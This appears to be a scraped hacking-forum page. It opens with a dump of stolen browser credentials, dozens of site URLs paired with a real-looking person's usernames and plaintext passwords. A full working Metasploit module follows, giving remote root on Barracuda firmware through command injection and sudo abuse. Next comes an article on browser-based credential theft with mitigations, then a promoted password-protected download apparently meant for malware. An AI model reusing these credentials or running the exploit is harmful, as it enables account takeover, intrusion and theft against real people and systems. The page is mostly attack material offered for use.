https://communicator...com/ox6/ox.html Username: christian.burger@grupo-maximus.eu Password: Sarese12! Application: Google Chrome Host: https://login.micros...e.com/login.srf Username: chris@formfinder.at Password: Sarese12!? Application: Google Chrome Host: https://www.joomlapolis.com/index.php Username: chrioll1965 Password: Sarese12! Application: Google Chrome Host: http://www.joomlacke...ead-more-button Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://localhost/hosting/install.php Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: https://grupomaximus...cloudforge.com/ Username: cburger1 Password: Sarese12! Application: Google Chrome Host: http://www.yeedeen.c...in-registration Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://www.gfxtra1.net/ Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://81.169.222.63.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://culinaria-vor.../administrator/ Username: cburger Password: Sarese12! Application: Google Chrome Host: https://owncloud.bony-club.eu/ Username: cburger Password: i&~8rN?2qpe( Application: Google Chrome Host: http://joomlacode.org/gf/account/ Username: chrioll Password: mco727865 Application: Google Chrome Host: http://www.bootply.com/CGj9cyTZwX Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://icomoon.io/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: https://adobeid-na1....der/pages/login Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.stockphot...rfree.com/join/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://front.bluepoint-service.at/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.kareebu.com/register Username: christian.burger@grupo-maximus.eu Password: Sarese12! Application: Google Chrome Host: http://localhost/wp/...min/install.php Username: chris Password: Sarese12! Application: Google Chrome Host: http://localhost/joomla/administrator/ Username: admin Password: admin Application: Google Chrome Host: http://owncloud.bluepoint-service.at/ Username: desiree Password: Sarese12! Application: Google Chrome Host: https://www.dropbox.com/account Username: chrioll@me.com Password: Sarese12! Application: Google Chrome Host: https://accounts.google.com/SignUp Username: mariavolperowain Password: MaRiA2014! Application: Google Chrome Host: http://www.seblod.com/ Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://85.214.78.91/...rator/index.php Username: cburger Password: Sarese12! Application: Google Chrome Host: http://t3.bluepoint-.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.pasha-rea...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://portal.bony-c.../administrator/ Username: cburger Password: Sarese12! Application: Google Chrome Host: http://www.ms-office.../attachment.php Username: chrioll Password: mco727865 Application: Google Chrome Host: https://www.etengo.d...ojektliste.jspx Username: burger1 Password: Sarese12! Application: Google Chrome Host: https://www.xing.com...rian_Taciulescu Username: christian.b@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: http://test.bluepoin.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.grupo-max...rator/index.php Username: 11631 Password: malaga Application: Google Chrome Host: http://forum.zhuk.cc...omponent/users/ Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://demo.testlink...atest/login.php Username: admin Password: admin Application: Google Chrome Host: http://de.skill.gameforge.com/landing/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.pasha-rea.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://data.formfinder.at/ Username: editor Password: ffedit43 Application: Google Chrome Host: http://www.astemplates.com/signin Username: grupomaximus Password: 0zin3tS0 Application: Google Chrome Host: http://panopanda.co/register Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://webmail.wasser-rettung.net/ Username: chris@wasser-rettung.net Password: mco727865 Application: Google Chrome Host: http://open.bluepoin...anel/auth/login Username: chrioll@gmail.com Password: i41B4fo Application: Google Chrome Host: http://ordasoft.com/...sk,advregister/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://goomaxx1.blue...admin/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://81.169.181.153/ Username: grupomaximus Password: ifnok5gfU0! Application: Google Chrome Host: https://login.skype.com/login Username: live:christian.b_17 Password: mco727865 Application: Google Chrome Host: http://jsfiddle.net/user/login/ Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://clicky.com/user/register Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://demo.jomclass...index.php/login Username: demo Password: demo Application: Google Chrome Host: http://test2.bluepoi...gistration-form Username: hansi Password: 1234567890 Application: Google Chrome Host: http://helpdesk.blue...rvice.at/admin/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://developers.phpjunkyard.com/ Username: php Password: php Application: Google Chrome Host: http://oclass.bluepo...admin/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://forums.osclass.org/activate/ Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://bluepoint.blu.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://mygully.com/t...-1-3-a-2760461/ Username: chrioll Password: mco727865 Application: Google Chrome Host: http://verein.bluepo...profile_new.php Username: admin Password: lz639ad Application: Google Chrome Host: http://sales.grupo-m...views/Anmelden/ Username: office Password: romulus2014top Application: Google Chrome Host: http://www.processon.com/signup/bind Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://quirktools.com/me/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.guia-culi...e/single-advert Username: demo Password: demo Application: Google Chrome Host: http://85.214.78.91/.../administrator/ Username: admin Password: bony.club Application: Google Chrome Host: http://link.samsung.com/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.w-b-s.net.../wiki/index.php Username: Cburger Password: chris2014 Application: Google Chrome Host: http://goomaxx.bluep...ass/install.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://localhost:8080/ Username: tomcat Password: s3cret Application: Google Chrome Host: http://www.xing.com/de Username: christian.b@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: http://www.joomlic.c.../identification Username: chrioll Password: Sarese12! Application: Google Chrome Host: https://e16927-phpmy...es.easyname.eu/ Username: u9400db7 Password: Sarese12! Application: Google Chrome Host: https://e16927-phpmy...es.easyname.eu/ Username: u9400db6 Password: r2TlEv6 Application: Google Chrome Host: http://www.schiessen-lienz.at/ Username: hsv Password: 2014schiessen Application: Google Chrome Host: https://www.akeebaba...m/download.html Username: chrioll Password: mco727865 Application: Google Chrome Host: http://www.schiessen...index.php/login Username: admin Password: Sarese12! Application: Google Chrome Host: https://store.steampowered.com/join/ Username: chrioll65 Password: Sarese12! Application: Google Chrome Host: https://boerse.to/ Username: chrisburg Password: O8-s5Q31 Application: Google Chrome Host: http://www.easyname.com/de Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: https://bitbucket.org/account/signin/ Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://www.psd-tutor...-oeffnen.93438/ Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://www.schiessen.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://iface.ff.lan/user/login/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: https://communicator....de/ox6/ox.html Username: c.burger@bony-club.eu Password: Sarese12! Application: Google Chrome Host: http://tibet.bluepoi...rator/index.php Username: florian Password: florian2014 Application: Google Chrome Host: http://localhost/joomla/administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.joomlackeditor.com/ Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://tibet.bluepoi.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://tibet.bluepoi...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: https://master-solut...cloudforge.com/ Username: cburger_bc Password: NqzwOWVGS8 Application: Google Chrome Host: http://office.bluepoint-service.at/ Username: admin Password: Sarese12! Application: Google Chrome Host: https://login.live.com/login.srf Username: christian.b@bluepoint-service.at Password: mco727865 Application: Google Chrome Host: http://iface.ff.lan/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: https://community.sp...com/login/login Username: office@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: https://webmail.easyname.com/ Username: 9400mail6 Password: Sarese12! Application: Google Chrome Host: https://webmail.easyname.com/ Username: 9400mail3 Password: sarese12 Application: Google Chrome Host: http://klagusch-sl.c...rator/index.php Username: Klaus - MAXiMUS Password: Oliver3977Lukas Application: Google Chrome Host: http://www.klagusch-...rator/index.php Username: Klaus - MAXiMUS Password: Oliver3977Lukas
  14. # Exploit Title: Barracuda Firmware <= 5.0.0.012 Post Auth Remote Root exploit # Exploit Author: xort # Vendor Homepage: https://www.barracuda.com/ # Software Link: https://www.barracuda.com/products/webfilter # Version: Firmware <= 5.0.0.012 # Tested on: Vx and Hardware platforms # # Postauth remote root in Barracuda Firmware <= 5.0.0.012 for any under priviledged user with report generating # capablities. This exploit leverages a command injection bug along with poor sudo permissions to obtain # root. xort@blacksecurity.org require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Barracuda Firmware <= 5.0.0.012 reporting Post Auth Remote Root', 'Description' => %q{ This module exploits a remote command execution vulnerability in the Barracuda Firmware Version <= 5.0.0.012 by exploiting a vulnerability in the web administration interface. By sending a specially crafted request it's possible to inject system commands while escalating to root do to relaxed sudo configuration on the local machine. }, 'Author' => [ 'xort', # metasploit module ], 'Version' => '$Revision: 12345 $', 'References' => [ [ 'none', 'none'], ], 'Platform' => [ 'linux'], 'Privileged' => true, 'Arch' => [ ARCH_X86 ], 'SessionTypes' => [ 'shell' ], 'Privileged' => false, 'Payload' => { # note: meterpreter can't run on host do to kernel 2.4 incompatibilities + this is stable 'Compat' => { 'ConnectionType' => 'find', } }, 'Targets' => [ ['Linux Universal', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], ], 'DefaultTarget' => 0)) register_options( [ OptString.new('PASSWORD', [ false, 'Device password', "" ]), OptString.new('ET', [ false, 'Device password', "" ]), OptString.new('USERNAME', [ true, 'Device password', "admin" ]), OptString.new('CMD', [ false, 'Command to execute', "" ]), Opt::RPORT(8000), ], self.class) end def do_login(username, password, et) vprint_status( "Logging into machine with credentials...\n" ) # timeout timeout = 1550; # params password_clear = "admin" real_user = ""; login_state = "out" enc_key = Rex::Text.rand_text_hex(32) et = "1358817515" locale = "en_US" user = username password = Digest::MD5.hexdigest(username+enc_key) enctype = "MD5" password_entry = "" vprint_status( "Starting first routine...\n" ) data = "real_user=#{real_user}&login_state=#{login_state}&enc_key=#{enc_key}&et=#{et}&locale=#{locale}&user=#{user}&password=#{password}&enctype=#{enctype}&password_entry=#{password_entry}&password_clear=#{password_clear}&Submit=Login" vprint_status( "#{data}\n" ) res = send_request_cgi( { 'method' => 'POST', 'uri' => "/cgi-mod/index.cgi", 'cookie' => "", 'data' => data }, timeout) vprint_status( "login got code: #{res.code} ... continuing to second request..." ) File.open("/tmp/output2", 'w+') {|f| f.write(res.body) } # get rid of first yank password = res.body.split('\n').grep(/(.*)id=\"password\" value=\"(.*)\"/){$2}[0] #change to match below for more exact result et = res.body.split('\n').grep(/(.*)id=\"et\" value=\"([^\"]+)\"/){$2}[0] vprint_status( "password got back = #{password} - et got back = #{et}\n" ) return password, et end def run_command(username, password, et, cmd) vprint_status( "Running Command...\n" ) exploitreq = [ [ "primary_tab", "BASIC" ], [ "secondary_tab","reports" ], [ "realm","" ], [ "auth_type","Local" ], [ "user", username ], [ "password", password ], [ "et",et ], [ "role","" ], [ "locale","en_US" ], [ "q","" ], [ "UPDATE_new_report_time_frame","custom" ], [ "report_start","2013-01-25 01:14" ], [ "report_end","2013-01-25 02:14" ], [ "type","" ], [ "ntlm_server","" ], [ "kerb_server","" ], [ "local_group","changeme" ], [ "ip_group","20.20.108.0/0.0.0.0" ], [ "ip_address__0","" ], [ "ip_address__1","" ], [ "ip_address__2","" ], [ "ip_address__3","" ], [ "netmask__0","" ], [ "netmask__1","" ], [ "netmask__2","" ], [ "netmask__3","" ], [ "UPDATE_new_report_pattern_values","" ], [ "UPDATE_new_report_pattern_text","" ], [ "UPDATE_new_report_filter_destination","domain" ], [ "filter_domain","" ], [ "UPDATE_new_report_filter_domain","" ], [ "UPDATE_new_report_filter_category","" ], [ "UPDATE_new_report_exclude_from","" ], [ "UPDATE_new_report_exclude_to","" ], [ "UPDATE_new_report_exclude_days","" ], [ "allow","allow" ], [ "block","block" ], [ "warn","warn" ], [ "monitor","monitor" ], [ "UPDATE_new_report_filter_actions","allow,block,warn,monitor" ], [ "UPDATE_new_report_filter_count","10" ], [ "UPDATE_new_report_chart_type","vbar" ], [ "UPDATE_new_report_format","html" ], [ "DEFAULT_new_report_group_expand","No" ], [ "UPDATE_new_report_expand_user_count","5" ], [ "UPDATE_new_report_expand_domain_count","5" ], [ "UPDATE_new_report_expand_cat_count","5" ], [ "UPDATE_new_report_expand_url_count","5" ], [ "UPDATE_new_report_expand_threat_count","5" ], [ "report","on" ], [ "UPDATE_new_report_name", Rex::Text.rand_text_alphanumeric(10) ], [ "UPDATE_new_report_id","" ], [ "UPDATE_new_report_enabled","Yes" ], [ "secondary_scope","report" ], [ "secondary_scope_data","" ], [ "UPDATE_new_report_reports","sessions_by_user,infection_activity" ], [ "UPDATE_new_report_delivery","external" ], [ "UPDATE_new_report_delivery_dest_email","" ], [ "UPDATE_new_report_server","new" ], [ "UPDATE_new_external_server_type","smb" ], [ "UPDATE_new_external_server_alias", Rex::Text.rand_text_alphanumeric(10) ], [ "UPDATE_new_external_server","4.4.4.4" ], [ "UPDATE_new_external_server_port","445" ], [ "UPDATE_new_external_server_username","\"` #{cmd} `\"" ], [ "UPDATE_new_external_server_password","asdf" ], [ "UPDATE_new_external_server_path","/"+ Rex::Text.rand_text_alphanumeric(15) ], [ "UPDATE_new_report_frequency", "once" ], [ "UPDATE_new_report_split", "no" ], [ "add_report_id","Apply" ], [ "remover","" ] ] data = Rex::MIME::Message.new data.bound = "---------------------------" + Rex::Text.rand_text_numeric(30) exploitreq.each do |xreq| data.add_part(xreq[1], nil, nil, "form-data; name=\"" + xreq[0] + "\"") end post_data = data.to_s post_data = post_data.gsub(/\r\n---------------------------/, "---------------------------") datastore['UserAgent'] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0" vprint_status( "sending..." ) res = send_request_cgi({ 'method' => 'POST', 'uri' => "/cgi-mod/index.cgi", 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data, 'headers' => { 'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", 'Accept-Language' => "en-US,en;q=0.5" } }) if res.code == 200 vprint_status( "You can now reuse the login params you were supplied to avoid the lengthy wait at the exploits initial launch.... \n" ) vprint_status( "password: #{password} et: #{et}\n" ) end vprint_status( "login got code: #{res.code} from report_results.cgi\n" ) File.open("/tmp/output4", 'w+') {|f| f.write(res.body) } end def run_script(username, password, et, cmds) vprint_status( "running script...\n") end def exploit # timeout timeout = 1550; user = "admin" # params real_user = ""; login_state = "out" et = "1358817515" #epoch time locale = "en_US" user = "admin" password = "" enctype = "MD5" password_entry = "" password_clear = "admin" vprint_status("<- Encoding payload to elf string...") elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\x\1\2') # extra escaping to get passed down correctly if not datastore['PASSWORD'].nil? and not datastore['PASSWORD'].empty? password_clear = "admin" password = datastore['PASSWORD'] et = datastore['ET'] # else - if no 'CMD' string - add code for root shell else password, et = do_login(user, password, et) vprint_status("new password: #{password}\n") end sleep(5) if not datastore['CMD'].nil? and not datastore['CMD'].empty? cmd = datastore['CMD'] end run_command(user, password, et, cmd) # create elf in /tmp, abuse sudo to overwrite another command we have sudo access to (static routes scripts), then execute with sudo perm cmd = "echo -ne #{encoded_elf} > /tmp/x ;" cmd += "chmod +x /tmp/x ;" # backup static_routes file cmd += "cp -f /home/product/code/config/static_routes /tmp/zzz" cmd += "sudo cp -f /bin/sh /home/product/code/config/static_routes" # execute elf as root cmd += "sudo /home/product/code/config/static_routes -c /tmp/x ;" # restore static_routes file cmd += "cp -f /tmp/zzz /home/product/code/config/static_routes" run_command(user, password, et, cmd) sleep(2) handler sleep(5) end end Source: http://packetstorm.wowhacker.com/1504-exploits/barracuda_5x_reports_postauth_root_exploit.rb.txt
  15. Abstract Web browsers or mobile browsers are software applications that act as the intermediary applications between a user and the World Wide Web and are used to access information from the Web. Some of the popular browsers which we are using in our daily life are Google Chrome, Mozilla Firefox, Internet Explorer, Opera, Safari, etc. With their wide usage and increasing popularity, they have become one of the major targets for exploitation by hackers. A small mistake during the coding of the application may result in it being vulnerable to intrusions. This article is going to cover a few browser-based attacks, which are not browser specific and can be exploited on any browser if not closed by the application developers during writing or designing the application. The following browser-based attacks, along with the mitigation, are going to be covered in this article: Browser cache: Obtaining sensitive information from the cache stored in browsers. Back and Refresh attack: Obtaining credentials and other sensitive data by using the Back button and Refresh feature of the browser. Passwords in browser memory: Getting the password or credit card details stored in the browser’s physical memory. Autocomplete: Obtaining the credentials of a user from the stored password in the browser. Browser history: Sensitive information leaked through the URL from the browser’s history. 1. Browser Cache Every time when a website is opened, the contents of that web page are sent to the browser’s temporary cache folder of a user’s machine. If those contents on that web page need to load again, the browser opens the page from the cache instead of downloading the page again. If some web application stores and shows the sensitive information to the user (such as their address, credit card details, username), this information could also be stored for caching, and hence it is retrievable through examining the browser’s cache. In IE, these pages are stored in C:\Users\<user_name>\AppData\Local\Microsoft\Windows\Temporary Internet Files In Firefox, these pages are stored in C:\Users\<user_name>\AppData\Local\Mozilla\Firefox\Profiles\<profile-id>\Cache Or by typing the following URL in the address bar of the browser: about:cache In Chrome, these pages are stored in C:\Users\<user_name>\AppData\Local\Google\Chrome\User Data\Default\Cache Or by typing the following URL in the address bar of the browser: chrome://cache Proof of Concept This demo is shown in the Mozilla Firefox browser. Log in to the application, access a few pages and then log out of the application. In the address bar, type about:cache. This shows the cache store in the browser. Go through the list and access the cache content of the website you are interested in. The following screenshot shows the URL for the user dashboard. The user dashboard can have sensitive information like address, phone number, mapped credit card details, e-mail ID, etc. On opening a specific cache entry, the user dashboard can be seen along with the address, phone number, order history, etc. This is shown in the following screenshot Mitigation This problem can be mitigated by setting proper cache control attributes in the response header. Mainly there are two types of cache attributes: 1. Cache-control: no-cache The no-cache attribute indicates that the browser should not use the information that is cached for that particular request–response pair. The browser stores the cache, but instead of showing the content from the cache, it sends the request to the server each time. But again, the cache will be only be in the browser and can be easily accessed by an attacker or malicious user. 2. Cache-control: no-store The no-store attribute indicates that the request–response pair should not be cached and stored in the browser. This applies to the entire page. 3. Using HTML meta tags You can implement the cache control using Meta tags also. Meta tags can be set as follows: <meta http-equiv=”Cache-Control” content=”no-cache” /> <meta http-equiv=”Cache-Control” content=”no-store” /> Here, if the cache-control header is manually appended in the HTTP response and set to no-cache, as shown in the following screenshot, the browser will still cache the page. If the browser cache is accessed, the cached pages of a user’s dashboard can be found. Opening it in Offline mode will show the order details, as shown in the screenshot below. Now, if the value of a cache-control header is set to no-store, no-cache and the browser cache is accessed, the cached pages of a user’s dashboard will not be found. This is shown in the following screenshots. Hence, the developer should analyze the web page content and implement proper cache-control attributes on the pages storing sensitive data. 2. Password in browser memory Most of the applications and servers store the password in hashed or encrypted format, but such hashing/encryption is not applied while storing passwords in the browser memory. The GET and POST requests on any sensitive page where the user is supplying sensitive information (like credentials, credit card number, etc.) is stored in the browser memory while it is open. An attacker with local access to the system can read the sensitive data using memory-reading tools like WinHex. An adversary with physical access to the user’s open browser, after logout, can thus steal the sensitive data from the memory. Once sensitive data like a password is discovered, attackers can escalate their privileges in the application. Proof of Concept Access the application. Enter the valid credentials, as shown in the following screenshot, and browse through the application. After logging out of the application, do not close the browser. Open any memory reading tool like “Winhex” and navigate to the following path, as shown in the screenshots below: Tools ? Open Ram ? Choose a browser (in this case Firefox) ? Select Entire Memory Search through the data using the username. The complete login request for that specific application can be obtained, as shown in the screenshot below. From here, an attacker can steal the login credentials of a user and escalate his privilege. Mitigation As this problem is present in the browser/local machine, using SSL will not mitigate this. A user can’t stop the browser from storing the password or other sensitive information. A solution has to be implemented through which the attacker can’t replay the password value obtained from the physical memory. So, the solution for this is to implement salted hashing. Instead of sending the password to the server, send the salted hash value of the password. Here is how the salted hashing technique works: Store the MD5 hash of the password in the database. (MD5 hash is a cryptographic technique in which the actual value can never be recovered). When a client requests for a login page, the server generates a random number called salt and sends it to the user along with the page. A JavaScript present on the client machine calculates the MD5 hash of the password entered by the user. It then combines the hash value with the salt value and recalculates the hash value. This hash value is sent to the server. The server picks the hash value of the password from its database, combines it with the salt value and calculates the MD5 hash value. If both the values match (it will happen only when the user enters the correct password), the user is authenticated to the application. Every time the salt value will be different; hence, even if the attacker gets the hashed password from the browser’s memory, he can’t replay it. Another solution could be implementing a JavaScript, which forcefully closes the browser once the user is logged out of the application. This will flush the complete memory of the browser, and hence no data can be retrieved from the browser’s memory. 3. Back and Refresh attack Browsers have the ability to maintain a recent record of pages that were visited by a user. The Back and Forward buttons on browsers use this functionality to display the pages recently browsed. In addition, browsers also keep track of variables like username, password, credit card details, etc. that were POSTed to the server while fetching the page. If a user logs in to the website, performs some actions and then logs out, and an adversary has access to the same machine as the user, he can see the logout page that is displayed on the browser window. He can then click the Back button until he reaches the page shown after a successful login. Here, the attacker can click the Refresh button, and the browser automatically resubmits the request with all the information. Proof of Concept Consider the Change Password page of an application: Log in to the application and access the Change Password page. Enter the values in the Current Password and New Password fields and click Submit. The request and response series for the Change Password request are shown in the following screenshots. Request Response The following screenshot shows that the password gets changed successfully. Browse through the application and then log out of the application. After logout, leave the machine without closing the browser window. An attacker who has physical access to this machine can simply click the Back button drop-down list and identify the page which comes after the Change Password page. This is depicted in the following screenshot. When a specific page is clicked, the browser displays the warning that the page has expired, as shown in the following screenshot. At this point the attacker can start a browser proxy tool like Burp and configure the browser to send its requests through the proxy. On the error page, the adversary clicks the Refresh button. The browser shows a pop-up warning to the user about reposting some of the variables in order to access the page, as shown in the screenshot below. The attacker clicks the “Resend” button. The attacker can see the request going to server using the configured proxy tool and can steal the password value of the user. This is shown in the screenshot below. Variation of the attack Many times it has been observed that the site is using redirection on successful login but not on unsuccessful login. If a login page is secured by CAPTCHA and the user provides the correct credentials but the wrong CAPTCHA value, then the user is again served with the login page with an error message. In this case too, an attacker can steal the credentials using the Back and Refresh features. Even if CAPTCHA is not implemented, an attacker can get some sensitive information like correct username or password. Proof of Concept Access the login page of the application and provide the correct username and wrong password, as shown in the following screenshot. After validating the credentials, the server responds with a “200 OK” with error stating “Username/Password is wrong”. This is shown in the screenshots below. Click the Back button and access the page which came after providing the incorrect credentials, as shown in the following screenshot. The browser warns that the document has expired and asks the user to resend the data to the server, as shown in the following screenshot. Configure the proxy between the browser and server and intercept the data going to the server. Click the “Resend” button. The user credentials can be seen in cleartext in the captured request, as shown in the following screenshot. Cause of problem The browser keeps track of the requests sent to server to fetch particular pages. In this case, the Change Password page is “changepass.aspx” and the page which appears after is “changepass1.aspx”. The “changepass1.aspx” page is displayed after providing the Current, New and Confirm Password values. So, the browser remembers the request which is sent to get the “changepass1.aspx” page. The following steps are present for the existing scenario: The user accesses the “changepass.aspx” page. The user types the current password, new password, and confirm new password and submits the request which is sent to “changepass1.aspx”. The user is authenticated in the “changepass1.aspx” page. The user is served with the “changepass1.aspx” page. When the attacker clicks the “changepass1.aspx” page, the request which was sent to render “changepass1.aspx” is resent to the server. This request contains the current, new and confirm new password values. Mitigation The following steps will be performed if an intermediate page is implemented between “changepass.aspx” and “changepass1.aspx”: The user accesses the “ChangePass.aspx” page. The user types the current password, new password, and confirm new password and submits the request to “CheckPass.aspx” The user is authenticated in the “CheckPass.aspx” page. The user is redirected to the “ChangePass1.aspx” page. The browser sends a new request to fetch the “ChangePass1.aspx” page. Now, even if an attacker refreshes the “changepass1.aspx” page, the request which the browser used to get “changepass1.aspx” will be sent, which is a redirect request sent by “CheckPass.aspx”. The request will be a simple GET request for fetching “ChangePass1.aspx” and there will be no value going in that request. The solution should be implemented on all the pages where a form is being submitted or some sensitive action is happening. 4. Autocomplete In many applications, when the user submits credentials, the browser shows a pop-up for remembering the password. If the user clicks “Remember password”, the browser will store the password and automatically enter it when the same application is accessed again. The feature is convenient for users, as they don’t have to remember and enter the password, but it poses a problem if the user is using this feature on a shared or public computer. An attacker can easily retrieve the stored password from the browser. Even if the stored passwords are encrypted or protected by the master password (a password to access the stored passwords), an attacker can retrieve this password by visiting the application, for which the password is stored, in the browser. An attacker enters the username and the browser automatically fills the password field. An attacker can run a proxy tool like Burp to intercept the request going to server and then can obtain the cleartext or encrypted password going to server. The saved password can be accessed by navigating to: Firefox: Options ? Security ? Saved Password Chrome: Settings ? Manage password (Under password and forms) IE: Internet Options ? Content ? AutoComplete Settings ? Manage Passwords Proof of Concept Here, after entering the credentials, the browser shows a popup asking the user if the password for the website should be remembered. This is depicted in the screenshot below. If the user clicks “Remember Me”, the password will be stored in the browser. In Firefox, the saved password can be accessed by navigating to Tools ? Options ? Security ? Saved Password. This is depicted in the following screenshot. When the “Saved Passwords” button is clicked, the browser shows the list of websites for which the passwords are stored in the browser. This is shown in the following screenshot. If the “Show Passwords” button is clicked, the user will be able to see the stored passwords, as shown in the screenshot below. Now, suppose the list of stored passwords is secured by a master password in the browser. Then the user has to enter the master password to access the list, as shown in the screenshot below. In this case, an adversary needs to use an intermediate proxy tool to intercept the request going to the server. Go to the application and double click the username field. It will show the list of the stored usernames. Click one username and the browser will automatically fill the password from the stored password list. This password can’t be seen, as it is hidden behind the asterisk symbol. A user can click the Submit button and capture the request going to server using a web proxy tool like Burp. From the intercepted request, it is easy to find the password of submitted username, as the data can be seen in cleartext. This is shown in the following screenshot. Mitigation The problem can be solved by setting the Autocomplete attribute in the Login and other sensitive pages. Make sure the Autocomplete attribute for all sensitive pages is set to “off”. A sensitive page can be the Login page, change password page, edit information page, etc. If Autocomplete is not configured on the page, then by default it is “ON” and the application will store the information. This can be done using the following command: < form autocomplete=”off”> – It will set Autocomplete to “OFF” for all form fields in the page. Even if the browser is configured to store the password, the above code will overwrite the browser settings. The Autocomplete attribute is ignored in the latest versions of all browsers. Hence, the above solution won’t work for the latest versions of the browsers. As a security best practice, a user should be warned with a generic warning message about storing the cleartext password in the browser. A more advanced way of implementation, involving HTML and JavaScript, can be used. A sample code is available here. 5. Browser history When a user submits any data, it goes to the server either in a GET request or in a POST request. In a GET request the user data is present in the URL itself, whereas in a POST request the user data is present in the body of the request. The following two screenshots show user data going in GET and POST requests. All GET requests that are accessed from the browser are stored in the browser’s history and cache. This data can be viewed even if the user is logged out or the browser is closed by checking the history of the browser. So, if an application sends the user’s sensitive information through a GET request, i.e. through URL, an attacker can obtain this data by checking the browser history. GET request: POST request: Proof of Concept Here, after entering the credentials on the website when the user clicks the LOG IN button, the credentials are sent in a GET request. This is shown in the following screenshot. The request going to server is captured in Burp, which shows that the user provided data is sent as a GET request. This is depicted in the following screenshot. So, an attacker who has physical access to the user’s machine can see these credentials in the browser’s history, as shown in the screenshot below. In the same way, if an application sends other sensitive data like credit card details through the GET request, the data can be accessed from the browser history. Mitigation Never send sensitive information in the GET request. Data containing sensitive information should be sent through the POST request. When sensitive information is sent in the POST request, the data goes in the request body, and hence can’t be accessed from the browser history, because the browser history only shows all the GET requests. Implement the POST method in the form as shown below: <form name=”login” action=”index_submit” method=”POST” accept-charset=”utf-8?> The above screenshots shows that no sensitive data is being stored in the browser history when the application is using POST instead of the GET method. Conclusion So, we have now discussed some browser-based attacks in this article. These attacks are applicable on web as well as mobile browsers. To perform any of the above attacks, an attacker has to depend on the following points: The attacker should have physical access to the victim’s machine. For some attacks, the browser should not be closed. The victim should not delete the browsing history, cache, etc. Due to all these limitations, the risk rating for all the above mentioned attacks ranges from Medium to Low, but depending on the information received, it can be high too. If an attacker can get account/credit/debit card details in the browser’s cache or through the Back and Refresh attack, then the risk rating would be high. All these vulnerabilities can be avoided by implementing the proper controls discussed in this article. References https://devcenter.heroku.com/articles/increasing-application-performance-with-http-cache-headers https://www.owasp.org/index.php/Testing_for_Vulnerable_Remember_Password_(OTG-AUTHN-005) http://repo.hackerzvoice.net/depot_cehv6/CEHv6%20Module%2059%20How%20to%20Steal%20Passwords/Stealing_passwords_via_browsers.pdf Source
  16. Scan: Fucking Scan Me! - Results Download: https://www.sendspace.com/file/xbjbui Password: RAR TEA Tested with DC :
